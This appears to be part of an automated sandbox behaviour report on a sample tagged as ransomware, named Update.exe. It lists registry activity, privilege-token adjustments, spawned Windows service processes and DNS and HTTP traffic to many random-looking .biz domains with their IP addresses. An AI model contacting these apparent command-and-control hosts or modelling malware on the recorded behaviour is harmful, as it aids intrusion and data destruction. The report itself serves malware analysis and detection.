Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\System32\GameInputSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\System32\SensorDataService.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\System32\SensorDataService.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\System32\GameInputSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\System32\SensorDataService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\System32\SensorDataService.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\TieringEngineService.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\TieringEngineService.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\System32\SnippingTool.exe,-15052 = "Capture a portion of your screen so you can save, annotate, or share the image." C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\odbcint.dll,-1694 = "ODBC Data Sources (64-bit)" C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail" C:\Windows\system32\fxssvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\GameInputSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\GameInputSvc.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document" C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000 = "Remote Desktop Connection" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051 = "Snipping Tool" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\SearchFilterHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\GameInputSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\GameInputSvc.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\regedit.exe,-16 = "Registry Editor" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%systemroot%\system32\wdc.dll,-10031 = "Monitor the usage and performance of the following resources in real time: CPU, Disk, Network and Memory." C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\GameInputSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\mstsc.exe,-4001 = "Use your computer to connect to a computer that is located elsewhere and run programs or access files." C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\GameInputSvc.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d4d74ae9d444db01 C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\regedit.exe,-16 = "Registry Editor" C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000009ed92be9d444db01 C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\MdSched.exe,-4002 = "Check your computer for memory problems." C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\RecoveryDrive.exe,-500 = "Recovery Drive" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MOD C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\GameInputSvc.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000030ff51e9d444db01 C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-102 = "Microsoft Excel Template" C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%systemroot%\system32\Filemgmt.dll,-602 = "Starts, stops, and configures Windows services." C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001 = "Windows Memory Diagnostic" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\GameInputSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\SearchFilterHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000074b135eed444db01 C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\GameInputSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpe C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\speech\speechux\sapi.cpl,-5556 = "Dictate text and control your computer by voice." C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%CommonProgramFiles%\Microsoft Shared\Ink\mip.exe,-292 = "Math Input Panel" C:\Windows\system32\SearchProtocolHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\GameInputSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithList C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000091836ff0d444db01 C:\Windows\system32\SearchProtocolHost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@fxsresm.dll,-1132 = "Store in a folder" C:\Windows\system32\fxssvc.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\Taskmgr.exe,-32420 = "Task Manager" C:\Windows\system32\SearchProtocolHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\GameInputSvc.exe N/A
N/A N/A C:\Windows\System32\GameInputSvc.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\fxssvc.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\GameInputSvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\TieringEngineService.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\TieringEngineService.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\AgentService.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: 33 N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\alg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\alg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\alg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msdtc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msdtc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msdtc.exe N/A
Token: 33 N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\SearchIndexer.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe"

C:\Windows\System32\alg.exe

C:\Windows\System32\alg.exe

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv

C:\Windows\system32\fxssvc.exe

C:\Windows\system32\fxssvc.exe

C:\Windows\System32\GameInputSvc.exe

C:\Windows\System32\GameInputSvc.exe

C:\Windows\System32\GameInputSvc.exe

"C:\Windows\System32\GameInputSvc.exe" Global\GameInputSession_1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

C:\Windows\System32\msdtc.exe

C:\Windows\System32\msdtc.exe

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE

"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe

C:\Windows\SysWow64\perfhost.exe

C:\Windows\SysWow64\perfhost.exe

C:\Windows\system32\locator.exe

C:\Windows\system32\locator.exe

C:\Windows\System32\SensorDataService.exe

C:\Windows\System32\SensorDataService.exe

C:\Windows\System32\snmptrap.exe

C:\Windows\System32\snmptrap.exe

C:\Windows\system32\spectrum.exe

C:\Windows\system32\spectrum.exe

C:\Windows\System32\OpenSSH\ssh-agent.exe

C:\Windows\System32\OpenSSH\ssh-agent.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc

C:\Windows\system32\TieringEngineService.exe

C:\Windows\system32\TieringEngineService.exe

C:\Windows\system32\AgentService.exe

C:\Windows\system32\AgentService.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\SearchIndexer.exe

C:\Windows\system32\SearchIndexer.exe /Embedding

C:\Windows\system32\SearchProtocolHost.exe

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

C:\Windows\system32\SearchFilterHost.exe

"C:\Windows\system32\SearchFilterHost.exe" 0 936 940 948 8192 944 916

C:\Windows\System32\msdtc.exe

C:\Windows\System32\msdtc.exe

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe

C:\Windows\system32\spectrum.exe

C:\Windows\system32\spectrum.exe

C:\Windows\system32\SearchIndexer.exe

C:\Windows\system32\SearchIndexer.exe /Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 pywolwnvd.biz udp
US 54.244.188.177:80 pywolwnvd.biz tcp
US 8.8.8.8:53 pywolwnvd.biz udp
US 54.244.188.177:80 pywolwnvd.biz tcp
US 8.8.8.8:53 ssbzmoy.biz udp
US 8.8.8.8:53 ssbzmoy.biz udp
SG 18.141.10.107:80 ssbzmoy.biz tcp
US 8.8.8.8:53 177.188.244.54.in-addr.arpa udp
SG 18.141.10.107:80 ssbzmoy.biz tcp
US 8.8.8.8:53 cvgrf.biz udp
US 8.8.8.8:53 cvgrf.biz udp
US 54.244.188.177:80 cvgrf.biz tcp
US 8.8.8.8:53 107.10.141.18.in-addr.arpa udp
US 54.244.188.177:80 cvgrf.biz tcp
US 8.8.8.8:53 npukfztj.biz udp
US 44.221.84.105:80 npukfztj.biz tcp
US 8.8.8.8:53 przvgke.biz udp
US 8.8.8.8:53 105.84.221.44.in-addr.arpa udp
US 8.8.8.8:53 npukfztj.biz udp
US 172.234.222.138:80 przvgke.biz tcp
US 44.221.84.105:80 npukfztj.biz tcp
US 8.8.8.8:53 ww99.przvgke.biz udp
US 8.8.8.8:53 przvgke.biz udp
US 72.52.179.174:80 ww99.przvgke.biz tcp
US 172.234.222.138:80 przvgke.biz tcp
US 8.8.8.8:53 ww12.przvgke.biz udp
US 8.8.8.8:53 138.222.234.172.in-addr.arpa udp
US 8.8.8.8:53 174.179.52.72.in-addr.arpa udp
US 76.223.26.96:80 ww12.przvgke.biz tcp
US 72.52.179.174:80 ww99.przvgke.biz tcp
US 76.223.26.96:80 ww12.przvgke.biz tcp
US 8.8.8.8:53 zlenh.biz udp
US 8.8.8.8:53 knjghuig.biz udp
US 8.8.8.8:53 96.26.223.76.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SG 18.141.10.107:80 knjghuig.biz tcp
SG 18.141.10.107:80 knjghuig.biz tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 uhxqin.biz udp
US 8.8.8.8:53 anpmnmxo.biz udp
US 8.8.8.8:53 lpuegx.biz udp
RU 82.112.184.197:80 lpuegx.biz tcp
RU 82.112.184.197:80 lpuegx.biz tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
RU 82.112.184.197:80 lpuegx.biz tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 vjaxhpbji.biz udp
RU 82.112.184.197:80 vjaxhpbji.biz tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
RU 82.112.184.197:80 vjaxhpbji.biz tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 xlfhhhm.biz udp
SG 47.129.31.212:80 xlfhhhm.biz tcp
US 8.8.8.8:53 212.31.129.47.in-addr.arpa udp
US 8.8.8.8:53 ifsaia.biz udp
SG 13.251.16.150:80 ifsaia.biz tcp
US 8.8.8.8:53 saytjshyf.biz udp
US 44.221.84.105:80 saytjshyf.biz tcp
US 8.8.8.8:53 vcddkls.biz udp
SG 18.141.10.107:80 vcddkls.biz tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 fwiwk.biz udp
